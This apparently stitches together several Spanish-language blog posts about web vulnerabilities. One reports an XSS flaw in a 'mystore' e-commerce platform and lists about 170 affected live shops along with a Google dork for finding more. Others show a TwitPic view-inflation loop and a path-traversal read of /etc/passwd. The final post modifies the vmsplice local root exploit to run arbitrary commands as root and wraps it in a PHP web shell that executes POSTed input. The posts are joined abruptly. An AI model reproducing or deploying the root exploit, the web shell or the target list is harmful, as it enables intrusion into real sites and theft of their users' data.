Según Google, son un poco más de mil sitios los que utilizan esta plataforma y que serían vulnerables a este tipo de ataques.

Al tratarse de un eCommerce, esta vulnerabilidad es aún más peligrosa ya que el atacante podría explotarla para obtener información de los usuarios como números de tarjetas de crédito, correos, usuarios y contraseñas, todo esto mediante phishing, usando el dominio del sitio en el que el usuario confía. Tambien se pueden elaborar ataques mas sofisticados para robar las sesiones a los usuarios que previamente hayan iniciado sesión.

La vulnearbilidad se encuentra en el archivo “error.php” y se produce al no filtrar los parametros de entrada mediante las variables “p” y “s“. El script simplemente imprime el valor de las variables, sin filtrarlas ni escapar caracteres, permitiendo XSS.

Una lista de algunos sitios afectados:

abysinvitationsprintshop.com
accesorioselauto.com
adobetecnoterra.com
adrenalinamotor.mx
akarienlinea.com
aldebaranuno.com
aleissi.mx
anabolicstorexpress.com
ankah2o.com
antibalastucomprasegura.com
aquatica-online.com
armarecuerdoseinvitaciones.com
armyatvstore.com
babybodega.mx
bazar12.com
beerandfashionmexico.com
bellezanutritiva.com.mx
bichitour.com
bienesraicespremium.com
bigjockey.com
billyoplazapiel.com
blancoscorona.com
bricks-store.com
cajasybolsas.com
caramolli.com
cavaboutique.com
ceciliamartinezgarza.com
centralnt.com
colofoninfantil.com
comercialdeestanteria.com.mx
comerciantes.mx
compraconplazo.com
compupagos.com.mx
compuventa-online.com
contitech-solutions.com
cosasdeingenieria.com
decocuadros.com.mx
dekocuadros.com
deyacut.com
digielectronik.com
distribuidorazaqueo.com
diveencounters.mx
doshik.com
e-tronic-shop.com
edicionesuromex.com
elgloborojotienda.com
ellamodas.com
elmundodelasfajas.com
enac-audio.com
enelbazarxalapa.com
entradaxsalida.com
enviamiregalo.com
eplaza.com.mx
fantasias-daniel.com
farmaciadelnino.com
fashion1services.com
fastlapstore.com
fermentando.com.mx
florerialorena.com
forjasdesign.com
fraganciamania.com.mx
fvi.mx
gadgetmex.com
galeriagalamania.com
globaris-shop.com
grupocomputacionaldeco.com
grupoelrey.com
gscomputadoras.com
hogarynegocio.com
hypnosefashionstore.com
imperiusarts.com
importacionesecm.com
indumaqsa.com
infoxweb.com
inhaus.mx
irrealcandybar.com
its-acapulco.com
javoil.com
joyeriasagara.com
julianna-jewelry.com
kingmonstermty.com
kiutstore.com
konexionmusical.com
lacombasoccer.com
ladecimaletragdl.com
lapsrepairs.com
lasmatadoras.com
libros.com.mx
liderpowertools.com
lizfloreria.com
lunerougeboutique.com
maimaitienda.com
mandycreaciones.com
manikin-online.com
maniquiesonline.com
maquinariaexpress.com
megapixelcomputadoras.com
mercaditoparati.com
mexi-cali.net
modayregalos.com
mothernity.com.mx
mtystore.com
muebleriamaya.com
mundoescolar11.com
mydogpharma.com
naturatoshop.com
naturenmexico.com
nochederio.com
onlineplayeras.com
ouletgnc.com
pa-xi.com
paraleer.com
pasatiempo-juguetes.com
petnc.com
pinnacleventa.com
plazamesonesvirtual.com
pro-limp.com
prodoorventas.com
psmodelismo.com
r3silencia.com
raqmar.com.mx
rcomunicaciones.com
recuerdosybolos.com
reducingbodysiluet.com
regala123.com
regala123.com.mx
regalosconvida.com
reguladoresypcs.com
safetystoremexico.com
seducelo.com
seducelo.com.mx
setfi.us.com
sexylencerias.com
shop4evermx.com
siaproductos.com
sistemascompac.com
sitesirve.com
smart-atic.com
solarislabs.com
solodebateria.com
spixalapa.com
sportjordan.com
store-htpro.com
sunlounge.com.mx
taipacificoimportaciones.com
techosmas.com
tecnologiailimitada.com
tenisclubcolombia.com
thecellulardepot.com
theredzone.com.mx
tienda128.mystorexpress.com
tienda573.mystorexpress.com
tiendabolsasbichat.com
tiendadicer.com
tiendaenriko.com
tiendaofficeadm.com
tiendapetmark.com
tiendatn.com
tinkert.com
todocompu.com
transfermania.com.mx
treneshodemexico.com
treneshodetexas.com
trovarti.com
tucalentadordepaso.com.mx
tumejorcompra.net
tumueblebarato.com
tumundodeportivo.com
vinilium.com
winemexsa.com

Para buscar la lista completa de los sitios afectados, puedes realizar la siguiente busqueda en Google:

inurl:mystore inurl:error.php filetype:php

Tambien se reportaron algunas vía secureless.

La empresa que está detras de este sistema ya ha sido notificada.

Por lo general son descuidados y permiten la inyección de código html o javascript en los campos “buscar” de los buscadores de cada sitio. Por ejemplo en el sitio web del Grupo Santander:

Si inyectamos código HTML y JavaScript para desplegar una alerta, como <script>alert(/it sucks/)</script> o similar, veremos como el navegador interpretará el código.

En este caso no existe el riesgo del robo de identidad pero si existe la posibilidad de realizar phishing usando la confianza del dominio “Santander.com“

Aunque está falla no implica ningún riesgo de seguridad, yo lo considero un bug y se los reporté a los encargados de TwitPic, pero no lo han solucionado ni me han respuesto el correo.
Este bug lo podemos comprobar al hacer varias veces F5 (recargar la página) y vemos como las visitas aumentan.
El comando para aprovecharse de este bug:

while /bin/true; do wget -O /dev/null -o /dev/null; done

Demostración:

Busquemos una imágen cualquiera, nos fijamos en la cantidad de visitas y copiamos la URI:

Tiene 176 vistas y la uri es http://twitpic.com/mrsu

Ejecutamos el comando mágico:

[zerial@daila ~]$ while /bin/true; do wget http://twitpic.com/mrsu -O /dev/null -o /dev/null; done
(esperamos unos segundos … y cancelamos presioando control+c)
[zerial@daila ~]$

Volvemos a ver la imágen:

Y listo, tenemos más de dos mil vistas.

Como es de costumbre, me comuniqué con el encargado de este sitio web y le comenté el problema, él se mostró muy interesado y solucionó de inmediato el problema, su respuesta fue:

Ya hice el cambio que me recomendaste para permitir sólo descargas desde el directorio files. Te agradezco sinceramente el consejo que me diste, no sólo porque ha evitado un problema para la gente de olsc, sino también la gente de otros sitios que he hecho donde también he usado esta función.

La URL vulnerable era la siguiente es http://www.olsc.cl/download.php?f=../../../../fichero/a/obtener, la cual fue removida.

La forma de explotar este fallo era iniciar sesion con cualquier usuario y buscar algun documento, cuando acercabamos el mouse hacia el link podiamos ver:

Si modificabamos ese link, remplazando documento para descargar.pdf por alguna ruta a un archivo de sistema, podremos descargarlo. Por ejemplo

Con ../../../../ nos aseguramos retroceder lo suficiente para llegar a la raiz y con /etc/passwd le decimos al script download.php que nos entregue el fichero passwd, que guarda la informacion de usuarios de sistema. Obteniendo lo siguiente:

Dias despues de explotar y confirmar esta vulnerabilidad, me di el trabajo de comunicarles a los de soporte de ese sitio sobre este fallo obteniendo una respuesta en poco tiempo. Estaban muy agradecidos por haberles comunicado el problema. En unos minutos me agrego a gtalk/jabber el desarrollador del portal y me hizo unas preguntas, para saber como habia logrado explotar esa vulnerabilidad y en que consistia y, luego de haberle respondido algunas preguntas y haberlo ayudado, rapidamente solucionó el problema.

Las vulnerabilidades de tipo file/path disclosure son aquellas donde de alguna u otra forma podemos acceder a archivos del sistema que estan fuera del path de la web, como en este caso, por ejemplo si la web hubiese estado en /var/www/bibliodoc, mediante este bug pudimos acceder a un archivo ubicado en /etc/ que, claramente, esta fuera del directorio.

root-exploit.diff

1. 51a52
2. > char  *_cmd;
3. 55d55
4. < printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
5. 182,183d181
6. <
7. <       printf("[+] root\n");
8. 185c183,184
9. <       execl("/bin/bash", "bash", "-i", NULL);
10. —
11. >       system(_cmd);
12. >       //execl("/bin/bash", "bash", "-i", NULL);
13. 195a195
14. >       _cmd = argv[1];
15. 202,205d201
16. < printf("———————————–\n");
17. <       printf(" Linux vmsplice Local Root Exploit\n");
18. <       printf(" By qaaz\n");
19. <       printf("———————————–\n");
20. 221,223d216
21. <       printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
22. <       printf("[+] page: 0x%lx\n", pages[0]);
23. <       printf("[+] page: 0x%lx\n", pages[1]);
24. 241,243d233
25. <       printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
26. <       printf("[+] page: 0x%lx\n", pages[2]);
27. <       printf("[+] page: 0x%lx\n", pages[3]);
28. 258,259d247
29. <       printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
30. <       printf("[+] page: 0x%lx\n", pages[4]);
31. 269d256
32. <       printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size)

La modificacion que hago es eliminar todos los printf para que el resultado sea mas limpio ademas, tambien modifico el codigo para que ejecute el comando que nosotros le digamos y luego vuelva a su estado normal.

Demostracion

username@machine:~$ ./root-exploit whoami
root
username@machine:~$

De esta manera podremos programar un sencillo script en php para manipular la maquina vulnerable como se nos de la gana.

1. < ?PHP
2. print "
3. <form action="?" method="post">
4. <input name="cmd" type="text" />
5. <input type="submit" value="eXec!" />
6.  
7. ";
8. if(isset($_POST[‘cmd’]))
9. {
10.    print "<textarea cols="30" rows="120">";
11.    print shell_exec("./root-exploit ".$_POST[‘cmd’]);
12.    print "</textarea>";
13. }
14. ?>

Descargas
Variacion del exploit
Exploit original 1
Exploit original 2